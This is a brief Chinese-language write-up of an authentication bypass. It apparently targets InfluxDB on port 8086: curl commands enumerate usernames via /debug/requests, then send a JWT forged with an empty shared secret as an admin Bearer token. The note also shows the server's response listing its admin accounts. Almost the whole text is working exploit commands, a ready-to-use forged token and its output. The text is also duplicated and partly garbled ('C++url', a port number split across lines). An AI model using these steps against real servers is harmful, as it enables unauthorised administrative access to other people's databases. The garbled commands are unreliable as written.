0day复现步骤:1. 查找user namecurl -G "http://xxx:8086/debug/requests"2. 构造jwt token在线构造地址3. 构造认证头curl -G 'http://xxx:8086/query' --data-urlencode 'q=show users'
0day复现步骤:
1. 查找user name
C++url -G "http://xxx:8086/Debug/requests"
2. 构造jwt token
3. 构造认证头
curl -G 'http://xxx:808
6/query' --data-urlencode 'q=show users' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTU5Mjg0OTM1fQ.tUClNot9LgStSw57n26DSN-3NPkBiHizk-XOHMfJJJw'
返回
{"results":[{"statement_id":0,"series":[{"columns":["user","admin"],"values":[["admin",true],["read",false],["write",false],["telegraf",true]]}]}]}
成功
漏洞原理
JWT token shared-secret 默认为空